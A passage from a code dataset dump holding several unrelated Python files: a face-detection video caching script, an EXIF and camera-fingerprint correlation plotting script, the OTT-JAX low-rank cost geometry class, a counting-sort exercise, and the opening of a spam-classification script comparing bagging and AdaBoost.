torch.Tensor([image_size[1] / shrink, image_size[0] / shrink,\n image_size[1] / shrink, image_size[0] / shrink])\n for i in range(detections.size(1)):\n j = 0\n while detections[0, i, j, 0] >= thresh:\n curr_det = detections[0, i, j, [1, 2, 3, 4, 0]].cpu().numpy()\n curr_det[:4] *= scale.cpu().numpy()\n det.append(curr_det)\n j += 1\n\n if len(det) == 0:\n det_list.append(np.array([], dtype='float32'))\n else:\n det = np.row_stack((det))\n # if det.shape[0] > 1:\n # det = bbox_vote(det.astype(float))\n det_filtered = det[det[:, 4] > 0.5, :4]\n det_list.append(det_filtered)\n\n # Render\n if display:\n det_display = np.round(det_filtered).astype(int)\n render_img = frame_bgr_list[b]\n for rect in det_display:\n # cv2.rectangle(render_img, tuple(rect[:2]), tuple(rect[:2] + rect[2:]), (0, 0, 255), 1)\n cv2.rectangle(render_img, tuple(rect[:2]), tuple(rect[2:]), (0, 0, 255), 1)\n # if out_vid is not None:\n # out_vid.write(render_img)\n cv2.imshow('render_img', render_img)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n # Clear lists\n frame_bgr_list.clear()\n frame_tensor_list.clear()\n\n # Write to file\n with open(output_path, 'wb') as f:\n pickle.dump(det_list, f)\n\n\ndef get_prior_boxes(cfg, feature_maps, image_size):\n\n # number of priors for feature map location (either 4 or 6)\n variance = cfg['variance'] or [0.1]\n min_sizes = cfg['min_sizes']\n max_sizes = cfg['max_sizes']\n steps = cfg['steps']\n aspect_ratios = cfg['aspect_ratios']\n clip = cfg['clip']\n for v in variance:\n if v <= 0:\n raise ValueError('Variances must be greater than 0')\n\n mean = []\n\n if len(min_sizes) == 5:\n feature_maps = feature_maps[1:]\n steps = steps[1:]\n if len(min_sizes) == 4:\n feature_maps = feature_maps[2:]\n steps = steps[2:]\n\n for k, f in enumerate(feature_maps):\n # for i, j in product(range(f), repeat=2):\n for i in range(f[0]):\n for j in range(f[1]):\n # f_k = image_size / steps[k]\n f_k_i = image_size[0] / steps[k]\n f_k_j = image_size[1] / steps[k]\n # unit center x,y\n cx = (j + 0.5) / f_k_j\n cy = (i + 0.5) / f_k_i\n # aspect_ratio: 1\n # rel size: min_size\n s_k_i = min_sizes[k] / image_size[1]\n s_k_j = min_sizes[k] / image_size[0]\n # swordli@tencent\n if len(aspect_ratios[0]) == 0:\n mean += [cx, cy, s_k_i, s_k_j]\n\n # aspect_ratio: 1\n # rel size: sqrt(s_k * s_(k+1))\n # s_k_prime = sqrt(s_k * (max_sizes[k]/image_size))\n if len(max_sizes) == len(min_sizes):\n s_k_prime_i = math.sqrt(s_k_i * (max_sizes[k] / image_size[1]))\n s_k_prime_j = math.sqrt(s_k_j * (max_sizes[k] / image_size[0]))\n mean += [cx, cy, s_k_prime_i, s_k_prime_j]\n # rest of aspect ratios\n for ar in aspect_ratios[k]:\n if len(max_sizes) == len(min_sizes):\n mean += [cx, cy, s_k_prime_i / math.sqrt(ar), s_k_prime_j * math.sqrt(ar)]\n mean += [cx, cy, s_k_i / math.sqrt(ar), s_k_j * math.sqrt(ar)]\n\n # back to torch land\n output = torch.Tensor(mean).view(-1, 4)\n if clip:\n output.clamp_(max=1, min=0)\n return output\n\n\ndef bbox_vote(det):\n order = det[:, 4].ravel().argsort()[::-1]\n det = det[order, :]\n while det.shape[0] > 0:\n # IOU\n area = (det[:, 2] - det[:, 0] + 1) * (det[:, 3] - det[:, 1] + 1)\n xx1 = np.maximum(det[0, 0], det[:, 0])\n yy1 = np.maximum(det[0, 1], det[:, 1])\n xx2 = np.minimum(det[0, 2], det[:, 2])\n yy2 = np.minimum(det[0, 3], det[:, 3])\n w = np.maximum(0.0, xx2 - xx1 + 1)\n h = np.maximum(0.0, yy2 - yy1 + 1)\n inter = w * h\n o = inter / (area[0] + area[:] - inter)\n # get needed merge det and delete these det\n merge_index = np.where(o >= 0.3)[0]\n det_accu = det[merge_index, :]\n det = np.delete(det, merge_index, 0)\n if merge_index.shape[0] <= 1:\n continue\n det_accu[:, 0:4] = det_accu[:, 0:4] * np.tile(det_accu[:, -1:], (1, 4))\n max_score = np.max(det_accu[:, 4])\n det_accu_sum = np.zeros((1, 5))\n det_accu_sum[:, 0:4] = np.sum(det_accu[:, 0:4], axis=0) / np.sum(det_accu[:, -1:])\n det_accu_sum[:, 4] = max_score\n try:\n dets = np.row_stack((dets, det_accu_sum))\n except:\n dets = det_accu_sum\n dets = dets[0:750, :]\n return dets\n\n\ndef infer(net , img , transform , thresh , cuda , shrink):\n if shrink != 1:\n img = cv2.resize(img, None, None, fx=shrink, fy=shrink, interpolation=cv2.INTER_LINEAR)\n x = torch.from_numpy(transform(img)[0]).permute(2, 0, 1)\n # x = Variable(x.unsqueeze(0) , volatile=True)\n x = x.unsqueeze(0)\n if cuda:\n x = x.cuda()\n #print (shrink , x.shape)\n y = net(x) # forward pass\n detections = y.data\n # scale each detection back up to the image\n scale = torch.Tensor([ img.shape[1]/shrink, img.shape[0]/shrink,\n img.shape[1]/shrink, img.shape[0]/shrink] )\n det = []\n for i in range(detections.size(1)):\n j = 0\n while detections[0, i, j, 0] >= thresh:\n score = detections[0, i, j, 0]\n #label_name = labelmap[i-1]\n pt = (detections[0, i, j, 1:]*scale).cpu().numpy()\n coords = (pt[0], pt[1], pt[2], pt[3])\n det.append([pt[0], pt[1], pt[2], pt[3], score])\n j += 1\n if (len(det)) == 0:\n det = [ [0.1,0.1,0.2,0.2,0.01] ]\n det = np.array(det)\n\n keep_index = np.where(det[:, 4] >= 0)[0]\n det = det[keep_index, :]\n return det\n\n\ndef infer_flip(net , img , transform , thresh , cuda , shrink):\n img = cv2.flip(img, 1)\n det = infer(net , img , transform , thresh , cuda , shrink)\n det_t = np.zeros(det.shape)\n det_t[:, 0] = img.shape[1] - det[:, 2]\n det_t[:, 1] = det[:, 1]\n det_t[:, 2] = img.shape[1] - det[:, 0]\n det_t[:, 3] = det[:, 3]\n det_t[:, 4] = det[:, 4]\n return det_t\n\n\nif __name__ == \"__main__\":\n # Parse program arguments\n import argparse\n parser = argparse.ArgumentParser('cache_video')\n parser.add_argument('input', metavar='VIDEO',\n help='path to input video')\n parser.add_argument('-o', '--output', default=None, metavar='PATH',\n help='output directory')\n parser.add_argument('-dm', '--detection_model', metavar='PATH', default='weights/WIDERFace_DSFD_RES152.pth',\n help='path to face detection model')\n parser.add_argument('-b', '--batch-size', default=8, type=int, metavar='N',\n help='batch size (default: 8)')\n parser.add_argument('-d', '--display', action='store_true',\n help='display the rendering')\n parser.add_argument('-op', '--out_postfix', default='_dsfd.pkl', metavar='POSTFIX',\n help='output file postfix')\n parser.add_argument('--gpus', nargs='+', type=int, metavar='N',\n help='list of gpu ids to use (default: all)')\n args = parser.parse_args()\n main(args.input, args.output, args.detection_model, args.batch_size, args.display, args.out_postfix, args.gpus)\n","sub_path":"face_detection_dsfd/cache_video.py","file_name":"cache_video.py","file_ext":"py","file_size_in_byte":12744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"449533459","text":"#!/usr/bin/env python\n\nimport numpy\nfrom matplotlib import pyplot\nimport subprocess\n\ndirectory = '../../kodak_db'\ndata_dir = '../data/set_2/'\n\ndef get_exif(filename):\n from fractions import Fraction\n out, err = subprocess.Popen(['identify', '-format', '%[exif:FNumber],%[exif:ExposureTime],%[exif:ISOSpeedRatings]', filename], stdout=subprocess.PIPE).communicate()\n print(out)\n return [1.0 * Fraction(x) for x in out.strip().split(',')]\n\n\ndef read_image_exif_data(filelist):\n imagelist = []\n for image in filelist:\n item = get_exif(directory + \"/\" + image) + [image, ]\n imagelist.append(item)\n return imagelist\n\ndef read_exif_from_cache(numfiles):\n exif_data = numpy.fromfile(data_dir + \"exif_cache.dat\", dtype=numpy.float)\n return exif_data.reshape(numfiles, 4) # or 3?\n\ndef create_exif_data_cache():\n exif_data = []\n for i in range(numfiles):\n data = get_exif(filelist[i])\n exif_data.append(data)\n exif_data = numpy.array(exif_data, dtype=numpy.float)\n exif_data.tofile(data_dir + \"exif_cache.dat\")\n return exif_data\n\ndef get_filelist_from_files(directory):\n out, err = subprocess.Popen(['ls', directory], stdout=subprocess.PIPE).communicate()\n filelist = out.split()\n numpy.savetxt(data_dir + \"filelist.txt\", filelist, fmt=\"%s\")\n return filelist\n\ndef get_filelist_from_cache():\n filelist = numpy.loadtxt(data_dir + \"filelist.txt\", dtype=numpy.string_)\n return filelist\n\n\ndef distmat_fig(matrix_pce, matrix_ncc, matrix_ans):\n f, (ax1, ax2, ax3) = pyplot.subplots(nrows=1, ncols=3, sharex=True, sharey=True)\n ax1.set_adjustable('box-forced')\n ax2.set_adjustable('box-forced')\n ax3.set_adjustable('box-forced')\n\n ax1.imshow(matrix_pce, cmap=pyplot.cm.jet, vmax=100)\n ax1.set_title(\"PCE scores\")\n ax2.imshow(matrix_ncc, cmap=pyplot.cm.jet, vmin=-0.002, vmax=0.005)\n ax2.set_title(\"NCC scores\")\n ax3.imshow(matrix_ans, cmap=pyplot.cm.jet)\n ax3.set_title(\"ground truth\")\n f.tight_layout()\n f.savefig(\"compare_ncc_pce.png\", dpi=300)\n\n\ndef pce_analysis_fig(matrix_pce, matrix_fnum, matrix_exp, matrix_iso, matrix_fcl):\n f, ((ax1, ax2, ax3), (ax4, ax5, ax6)) = pyplot.subplots(nrows=2, ncols=3, sharex=True, sharey=True)\n ax1.set_adjustable('box-forced')\n ax2.set_adjustable('box-forced')\n ax3.set_adjustable('box-forced')\n ax4.set_adjustable('box-forced')\n ax5.set_adjustable('box-forced')\n ax6.set_adjustable('box-forced')\n\n ax1.imshow(matrix_pce, cmap=pyplot.cm.jet, vmax=100)\n ax1.set_title(\"PCE scores\")\n ax2.imshow(matrix_fnum, cmap=pyplot.cm.jet)\n ax2.set_title(\"f number\")\n ax3.imshow(matrix_exp, cmap=pyplot.cm.jet)\n ax3.set_title(\"exposure times\")\n ax4.imshow(matrix_iso, cmap=pyplot.cm.jet)\n ax4.set_title(\"ISO values\")\n ax5.imshow(matrix_fcl, cmap=pyplot.cm.jet)\n ax5.set_title(\"Focal Length\")\n f.set_size_inches(8, 4, forward=True)\n f.tight_layout()\n f.savefig(\"compare_pce.png\", dpi=300)\n\n pyplot.show()\n input()\n\n\n\n\n\nif __name__ == \"__main__\":\n\n #filelist = get_filelist_from_files(directory)\n filelist = get_filelist_from_cache()\n numfiles = len(filelist)\n\n #exif_data = create_exif_data_cache()\n #exif_data = read_exif_from_cache(numfiles)\n exif_data = read_image_exif_data(filelist)\n\n\n #matrix_file = 'cluster-analysis/data/set_2/matrix_304_pce.txt'\n #matrix_pce = numpy.loadtxt(matrix_file, delimiter=',', usecols=range(304))\n matrix_file = data_dir + 'matrix_304_pce.dat'\n matrix_pce = numpy.fromfile(matrix_file, dtype='>d')\n matrix_pce = matrix_pce.reshape(numfiles, numfiles)\n\n matrix_file = data_dir + 'matrix_304_ncc.txt'\n matrix_ncc = numpy.loadtxt(matrix_file, delimiter=',', usecols=list(range(304)))\n # matrix_file = data_dir + 'matrix_304_ncc.dat'\n # matrix_ncc = numpy.fromfile(matrix_file, dtype='>d')\n matrix_ncc = matrix_ncc.reshape(numfiles, numfiles)\n\n\n\n #generate additional matrices based on exif data and ground truth\n matrix_fnum = numpy.zeros( matrix_pce.shape, dtype=numpy.float)\n matrix_exp = numpy.zeros( matrix_pce.shape, dtype=numpy.float)\n matrix_iso = numpy.zeros( matrix_pce.shape, dtype=numpy.float)\n matrix_ans = numpy.zeros( matrix_pce.shape, dtype=numpy.float)\n matrix_fcl = numpy.zeros( matrix_pce.shape, dtype=numpy.float)\n\n for i in range(matrix_pce.shape[0]):\n for j in range(matrix_pce.shape[1]):\n# matrix_fnum[i][j] = numpy.sqrt(exif_data[i][0] * exif_data[j][0])\n# matrix_exp[i][j] = numpy.sqrt(exif_data[i][1] * exif_data[j][1])\n# matrix_iso[i][j] = numpy.sqrt(exif_data[i][2] * exif_data[j][2])\n# matrix_fcl[i][j] = numpy.sqrt(exif_data[i][3] * exif_data[j][3])\n matrix_fnum[i][j] = exif_data[i][0] * exif_data[j][0]\n matrix_exp[i][j] = exif_data[i][1] * exif_data[j][1]\n matrix_iso[i][j] = exif_data[i][2] * exif_data[j][2]\n# matrix_fcl[i][j] = exif_data[i][3] * exif_data[j][3]\n cam1 = \"_\".join(filelist[i].split(\"_\")[:-1])\n cam2 = \"_\".join(filelist[j].split(\"_\")[:-1])\n if cam1 == cam2:\n matrix_ans[i][j] = 100.0\n else:\n matrix_ans[i][j] = 1.0\n if i == j:\n matrix_ans[i][j] = 0.0\n matrix_fnum[i][i] = 0.0\n matrix_exp[i][i] = 0.0\n matrix_iso[i][i] = 0.0\n matrix_fcl[i][i] = 0.0\n\n\n# pce_analysis_fig(matrix_pce, matrix_fnum, matrix_exp, matrix_iso, matrix_fcl)\n\n #plot everything\n f, ((ax1, ax2, ax3), (ax4, ax5, ax6)) = pyplot.subplots(nrows=2, ncols=3, sharex=True, sharey=True)\n ax1.set_adjustable('box-forced')\n ax2.set_adjustable('box-forced')\n ax3.set_adjustable('box-forced')\n ax4.set_adjustable('box-forced')\n ax5.set_adjustable('box-forced')\n ax6.set_adjustable('box-forced')\n\n ax1.imshow(matrix_pce, cmap=pyplot.cm.jet, vmax=100)\n ax1.set_title(\"PCE scores\")\n ax2.imshow(matrix_ncc, cmap=pyplot.cm.jet, vmin=-0.002, vmax=0.005)\n ax2.set_title(\"NCC scores\")\n ax3.imshow(matrix_ans, cmap=pyplot.cm.jet)\n ax3.set_title(\"ground truth\")\n# ax3.imshow(matrix_fcl, cmap=pyplot.cm.jet)\n# ax3.set_title(\"focal length\")\n ax4.imshow(matrix_fnum, cmap=pyplot.cm.jet)\n ax4.set_title(\"f number\")\n ax5.imshow(matrix_exp, cmap=pyplot.cm.jet)\n ax5.set_title(\"exposure times\")\n ax6.imshow(matrix_iso, cmap=pyplot.cm.jet)\n ax6.set_title(\"iso values\")\n\n f.set_size_inches(20, 10, forward=True)\n f.tight_layout()\n f.savefig(\"pce_ncc_correlation.png\", dpi=300)\n\n pyplot.show()\n input()\n\n","sub_path":"scripts/exif.py","file_name":"exif.py","file_ext":"py","file_size_in_byte":6597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"584431796","text":"# Copyright OTT-JAX\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nfrom typing import Any, Callable, Literal, Optional, Tuple, Union\n\nimport jax\nimport jax.numpy as jnp\n\nfrom ott import utils\nfrom ott.geometry import geometry\n\n__all__ = [\"LRCGeometry\"]\n\n\n@jax.tree_util.register_pytree_node_class\nclass LRCGeometry(geometry.Geometry):\n \"\"\"Geometry whose cost is defined by product of two low-rank matrices.\n\n Implements geometries that are defined as low rank products, i.e. for which\n there exists two matrices :math:`A` and :math:`B` of :math:`r` columns such\n that the cost of the geometry equals :math:`AB^T`. Apart from being faster to\n apply to a vector, these geometries are characterized by the fact that adding\n two such geometries should be carried out by concatenating factors, i.e.\n if :math:`C = AB^T` and :math:`D = EF^T` then :math:`C + D = [A,E][B,F]^T`\n\n Args:\n cost_1: jnp.ndarray[num_a, r]\n cost_2: jnp.ndarray[num_b, r]\n bias: constant added to entire cost matrix.\n scale: Value used to rescale the factors of the low-rank geometry.\n scale_cost: option to rescale the cost matrix. Implemented scalings are\n 'max_bound', 'mean' and 'max_cost'. Alternatively, a float\n factor can be given to rescale the cost such that\n ``cost_matrix /= scale_cost``. If `True`, use 'mean'.\n batch_size: optional size of the batch to compute online (without\n instantiating the matrix) the scale factor ``scale_cost`` of the\n :attr:`cost_matrix` when ``scale_cost = 'max_cost'``. If `None`, the batch\n size is set to `1024` or to the largest number of samples between\n :attr:`cost_1` and :attr:`cost_2` if smaller than `1024`.\n kwargs: keyword arguments for :class:`~ott.geometry.geometry.Geometry`.\n \"\"\"\n\n def __init__(\n self,\n cost_1: jnp.ndarray,\n cost_2: jnp.ndarray,\n bias: float = 0.0,\n scale_factor: float = 1.0,\n scale_cost: Union[bool, int, float, Literal[\"mean\", \"max_bound\",\n \"max_cost\"]] = 1.0,\n batch_size: Optional[int] = None,\n **kwargs: Any,\n ):\n super().__init__(**kwargs)\n self._cost_1 = cost_1\n self._cost_2 = cost_2\n self._bias = bias\n self._scale_factor = scale_factor\n self._scale_cost = \"mean\" if scale_cost is True else scale_cost\n self.batch_size = batch_size\n\n @property\n def cost_1(self) -> jnp.ndarray:\n \"\"\"First factor of the :attr:`cost_matrix`.\"\"\"\n scale_factor = jnp.sqrt(self._scale_factor * self.inv_scale_cost)\n return scale_factor * self._cost_1\n\n @property\n def cost_2(self) -> jnp.ndarray:\n \"\"\"Second factor of the :attr:`cost_matrix`.\"\"\"\n scale_factor = jnp.sqrt(self._scale_factor * self.inv_scale_cost)\n return scale_factor * self._cost_2\n\n @property\n def bias(self) -> float:\n \"\"\"Constant offset added to the entire :attr:`cost_matrix`.\"\"\"\n return self._bias * self.inv_scale_cost\n\n @property\n def cost_rank(self) -> int: # noqa: D102\n return self._cost_1.shape[1]\n\n @property\n def cost_matrix(self) -> jnp.ndarray:\n \"\"\"Materialize the cost matrix.\"\"\"\n return jnp.matmul(self.cost_1, self.cost_2.T) + self.bias\n\n @property\n def shape(self) -> Tuple[int, int]: # noqa: D102\n return self._cost_1.shape[0], self._cost_2.shape[0]\n\n @property\n def is_symmetric(self) -> bool: # noqa: D102\n return (\n self._cost_1.shape[0] == self._cost_2.shape[0] and\n jnp.all(self._cost_1 == self._cost_2)\n )\n\n @property\n def inv_scale_cost(self) -> float: # noqa: D102\n if isinstance(self._scale_cost,\n (int, float)) or utils.is_jax_array(self._scale_cost):\n return 1.0 / self._scale_cost\n self = self._masked_geom()\n if self._scale_cost == \"max_bound\":\n x_norm = self._cost_1[:, 0].max()\n y_norm = self._cost_2[:, 1].max()\n max_bound = x_norm + y_norm + 2 * jnp.sqrt(x_norm * y_norm)\n return 1.0 / (max_bound + self._bias)\n if self._scale_cost == \"mean\":\n factor1 = jnp.dot(self._n_normed_ones, self._cost_1)\n factor2 = jnp.dot(self._cost_2.T, self._m_normed_ones)\n mean = jnp.dot(factor1, factor2) + self._bias\n return 1.0 / mean\n if self._scale_cost == \"max_cost\":\n return 1.0 / self.compute_max_cost()\n raise ValueError(f\"Scaling {self._scale_cost} not implemented.\")\n\n def apply_square_cost(self, arr: jnp.ndarray, axis: int = 0) -> jnp.ndarray:\n \"\"\"Apply elementwise-square of cost matrix to array (vector or matrix).\"\"\"\n (n, m), r = self.shape, self.cost_rank\n # When applying square of a LRCGeometry, one can either elementwise square\n # the cost matrix, or instantiate an augmented (rank^2) LRCGeometry\n # and apply it. First is O(nm), the other is O((n+m)r^2).\n if n * m < (n + m) * r ** 2: # better use regular apply\n return super().apply_square_cost(arr, axis)\n\n new_cost_1 = self.cost_1[:, :, None] * self.cost_1[:, None, :]\n new_cost_2 = self.cost_2[:, :, None] * self.cost_2[:, None, :]\n return LRCGeometry(\n cost_1=new_cost_1.reshape((n, r ** 2)),\n cost_2=new_cost_2.reshape((m, r ** 2))\n ).apply_cost(arr, axis)\n\n def _apply_cost_to_vec(\n self,\n vec: jnp.ndarray,\n axis: int = 0,\n fn: Optional[Callable[[jnp.ndarray], jnp.ndarray]] = None,\n is_linear: bool = False,\n ) -> jnp.ndarray:\n \"\"\"Apply [num_a, num_b] fn(cost) (or transpose) to vector.\n\n Args:\n vec: jnp.ndarray [num_a,] ([num_b,] if axis=1) vector\n axis: axis on which the reduction is done.\n fn: function optionally applied to cost matrix element-wise, before the\n doc product\n is_linear: Whether ``fn`` is a linear function to enable efficient\n implementation. See :func:`ott.geometry.geometry.is_linear`\n for a heuristic to help determine if a function is linear.\n\n Returns:\n A jnp.ndarray corresponding to cost x vector\n \"\"\"\n\n def linear_apply(\n vec: jnp.ndarray, axis: int, fn: Callable[[jnp.ndarray], jnp.ndarray]\n ) -> jnp.ndarray:\n c1 = self.cost_1 if axis == 1 else self.cost_2\n c2 = self.cost_2 if axis == 1 else self.cost_1\n c2 = fn(c2) if fn is not None else c2\n bias = fn(self.bias) if fn is not None else self.bias\n out = jnp.dot(c1, jnp.dot(c2.T, vec))\n return out + bias * jnp.sum(vec) * jnp.ones_like(out)\n\n if fn is None or is_linear:\n return linear_apply(vec, axis, fn=fn)\n return super()._apply_cost_to_vec(vec, axis, fn=fn)\n\n def compute_max_cost(self) -> float:\n \"\"\"Compute the maximum of the :attr:`cost_matrix`.\n\n Three cases are taken into account:\n\n - If the number of samples of ``cost_1`` and ``cost_2`` are both smaller\n than 1024 and if ``batch_size`` is `None`, the ``cost_matrix`` is\n computed to obtain its maximum entry.\n - If one of the number of samples of ``cost_1`` or ``cost_2`` is larger\n than 1024 and if ``batch_size`` is `None`, then the maximum of the\n cost matrix is calculated by batch. The batches are created on the\n longest axis of the cost matrix and their size is fixed to 1024.\n - If ``batch_size`` is provided as a float, then the maximum of the cost\n matrix is calculated by batch. The batches are created on the longest\n axis of the cost matrix and their size if fixed by ``batch_size``.\n\n Returns:\n Maximum of the cost matrix.\n \"\"\"\n batch_for_y = self.shape[1] > self.shape[0]\n\n n = self.shape[1] if batch_for_y else self.shape[0]\n p = self._cost_2.shape[1] if batch_for_y else self._cost_1.shape[1]\n carry = ((self._cost_1, self._cost_2) if batch_for_y else\n (self._cost_2, self._cost_1))\n\n if self.batch_size:\n batch_size = min(self.batch_size, n)\n else:\n batch_size = min(1024, max(self.shape[0], self.shape[1]))\n n_batch = n // batch_size\n\n def body(carry, slice_idx):\n cost1, cost2 = carry\n cost2_slice = jax.lax.dynamic_slice(\n cost2, (slice_idx * batch_size, 0), (batch_size, p)\n )\n out_slice = jnp.max(jnp.dot(cost2_slice, cost1.T))\n return carry, out_slice\n\n def finalize(carry):\n cost1, cost2 = carry\n return jnp.dot(cost2[n_batch * batch_size:], cost1.T)\n\n _, out = jax.lax.scan(body, carry, jnp.arange(n_batch))\n last_slice = finalize(carry)\n max_value = jnp.max(jnp.concatenate((out, last_slice.reshape(-1))))\n return max_value + self._bias\n\n def to_LRCGeometry(\n self,\n rank: int = 0,\n tol: float = 1e-2,\n rng: Optional[jax.random.PRNGKeyArray] = None,\n scale: float = 1.0,\n ) -> \"LRCGeometry\":\n \"\"\"Return self.\"\"\"\n del rank, tol, rng, scale\n return self\n\n @property\n def can_LRC(self): # noqa: D102\n return True\n\n def subset( # noqa: D102\n self, src_ixs: Optional[jnp.ndarray], tgt_ixs: Optional[jnp.ndarray],\n **kwargs: Any\n ) -> \"LRCGeometry\":\n\n def subset_fn(\n arr: Optional[jnp.ndarray],\n ixs: Optional[jnp.ndarray],\n ) -> jnp.ndarray:\n return arr if arr is None or ixs is None else arr[jnp.atleast_1d(ixs)]\n\n return self._mask_subset_helper(\n src_ixs, tgt_ixs, fn=subset_fn, propagate_mask=True, **kwargs\n )\n\n def mask( # noqa: D102\n self,\n src_mask: Optional[jnp.ndarray],\n tgt_mask: Optional[jnp.ndarray],\n mask_value: float = 0.,\n ) -> \"LRCGeometry\":\n\n def mask_fn(\n arr: Optional[jnp.ndarray],\n mask: Optional[jnp.ndarray],\n ) -> Optional[jnp.ndarray]:\n if arr is None or mask is None:\n return arr\n return jnp.where(mask[:, None], arr, mask_value)\n\n src_mask = self._normalize_mask(src_mask, self.shape[0])\n tgt_mask = self._normalize_mask(tgt_mask, self.shape[1])\n return self._mask_subset_helper(\n src_mask, tgt_mask, fn=mask_fn, propagate_mask=False\n )\n\n def _mask_subset_helper(\n self,\n src_ixs: Optional[jnp.ndarray],\n tgt_ixs: Optional[jnp.ndarray],\n *,\n fn: Callable[[Optional[jnp.ndarray], Optional[jnp.ndarray]],\n Optional[jnp.ndarray]],\n propagate_mask: bool,\n **kwargs: Any,\n ) -> \"LRCGeometry\":\n (c1, c2, src_mask, tgt_mask, *children), aux_data = self.tree_flatten()\n c1 = fn(c1, src_ixs)\n c2 = fn(c2, tgt_ixs)\n if propagate_mask:\n src_mask = self._normalize_mask(src_mask, self.shape[0])\n tgt_mask = self._normalize_mask(tgt_mask, self.shape[1])\n src_mask = fn(src_mask, src_ixs)\n tgt_mask = fn(tgt_mask, tgt_ixs)\n\n aux_data = {**aux_data, **kwargs}\n return type(self).tree_unflatten(\n aux_data, [c1, c2, src_mask, tgt_mask] + children\n )\n\n def __add__(self, other: \"LRCGeometry\") -> \"LRCGeometry\":\n if not isinstance(other, LRCGeometry):\n return NotImplemented\n return LRCGeometry(\n cost_1=jnp.concatenate((self.cost_1, other.cost_1), axis=1),\n cost_2=jnp.concatenate((self.cost_2, other.cost_2), axis=1),\n bias=self._bias + other._bias,\n # already included in `cost_{1,2}`\n scale_factor=1.0,\n scale_cost=1.0,\n )\n\n @property\n def dtype(self) -> jnp.dtype: # noqa: D102\n return self._cost_1.dtype\n\n def tree_flatten(self): # noqa: D102\n return (\n self._cost_1,\n self._cost_2,\n self._src_mask,\n self._tgt_mask,\n self._epsilon_init,\n self._bias,\n self._scale_factor,\n ), {\n \"scale_cost\": self._scale_cost,\n \"batch_size\": self.batch_size\n }\n\n @classmethod\n def tree_unflatten(cls, aux_data, children): # noqa: D102\n c1, c2, src_mask, tgt_mask, epsilon, bias, scale_factor = children\n return cls(\n c1,\n c2,\n bias=bias,\n scale_factor=scale_factor,\n epsilon=epsilon,\n src_mask=src_mask,\n tgt_mask=tgt_mask,\n **aux_data\n )\n","sub_path":"src/ott/geometry/low_rank.py","file_name":"low_rank.py","file_ext":"py","file_size_in_byte":12295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"136818913","text":"a = input() # Вводим данные\na = a.split()\n\nfor i in range(len(a)):\n a[i] = int(a[i])\n\ndiapazon = 1 + max(a) - min(a) # Вычисляем диапазон\nb = [0] * diapazon\n\nfor i in range(len(a)): # Считаем количество разных элементов\n b[a[i] - min(a)] += 1\n\nmin = min(a)\nmax = max(a)\n\nc = []\nfor i in range(diapazon): # Выводим\n while b[i] > 0:\n c.append(min+ i)\n b[i] -= 1\nprint(c)\n\n","sub_path":"FOX/Sortirovka_podchetom.py","file_name":"Sortirovka_podchetom.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"20959931","text":"\nimport random\nimport math\nimport numpy\nfrom sklearn import tree, svm, preprocessing\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.naive_bayes import GaussianNB, MultinomialNB, BernoulliNB\n\ndef main(task):\n\tif task == 1 :\n\t\tprint(\"Bagging + SVM\")\n\telif task == 2 :\n\t\tprint(\"Bagging + DTree\")\n\telif task == 3 :\n\t\tprint(\"Adaboost + SVM\")\n\telif task == 4 :\n\t\tprint(\"Adaboost + DTree\")\n\telif task == 5 :\n\t\tprint(\"Bagging + Gaussian Naive Bayes\")\n\telif task == 6 :\n\t\tprint(\"Adaboost + Gaussian Naive Bayes\")\n\n\tdataList = []\n\tattributesList = []\n\tX = []\n\ty = []\n\n\t#read data\n\t#sourceData = open(\"ContentNewLinkAllSample.csv\",'r')\n\tsourceData = open(\"ex1.csv\",'r') # only transformed link features\n\t#sourceData = open(\"ex2.csv\",'r') # only content features\n\t\n\t#read label (first line of the input file)\n\tline = sourceData.readline()\n\tline = line.strip('\\n')\t\t\t\t\t\n\tlineSplit = line.split(',')\t\t\t\t\n\tattributesList.append(lineSplit)\t\t\t\n\t\n\t#read data (rest of the input file)\n\tline = sourceData.readline()\n\twhile line:\n\t\tline = line.strip('.\\n')\t\t\t\n\t\tlineSplit = line.split(',')\t\t\t\n\t\tdataList.append( lineSplit ) \t\n\t\tline = sourceData.readline()\t\t\n\n\tsourceData.close()\n\n\t#covert data from string to float (except the class) and seperate to X & y\n\tfor data in dataList :\n\t\t#print(data)\n\t\tif data[-1] == \"spam\\r\" :\n\t\t\ty.append(0)\n\t\telse :\n\t\t\ty.append(1)\n\t\tX.append( [float(key) for key in data[:-1]] )\n\n\t#print(y)\n\t#normalize\n\tX = preprocessing.normalize(X)\n\n\t# print(attributesList)\n\t# print(dataList[0])\n\n\t#get training set & test set by resamlping\n\tX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42)\n\n\tif task == 1 or task == 2 or task == 5: #1Bagging + SVM / #2Bagging + DTree\n\t\tbootstrapSize = 100\n\t\tresult = []\n\t\tpredict = []\n\t\t#start single training\n\t\tfor i in range(bootstrapSize) :\n\t\t\tX_temp = []\n\t\t\ty_temp = []\n\t\t\t#get trainging set for bagging\n\t\t\tfor j in range( len(X_train) ):\n\t\t\t\tk = random.randint(0, len(X_train) - 1)\n\t\t\t\tX_temp.append( X_train[k] )\n\t\t\t\ty_temp.append( y_train[k] )\n\t\t\t#set classifier\n\t\t\tif task == 1:\n\t\t\t\tclf = svm.LinearSVC(dual=False)\n\t\t\tif task == 2:\n\t\t\t\tclf = tree.DecisionTreeClassifier()\n\t\t\tif task == 5:\n\t\t\t\tclf = GaussianNB()\n\t\t\tclf.fit(X_temp , y_temp)\n\t\t\t#predict by single training\n\t\t\tresult.append( clf.predict(X_test) )\n\t\t#predict by bagging\n\t\tfor i in range(len(y_test)):\n\t\t\tcount = 0\n\t\t\tfor j in range(bootstrapSize):\n\t\t\t\tif result[j][i] ==1 :\n\t\t\t\t\tcount += 1\n\t\t\tif count > 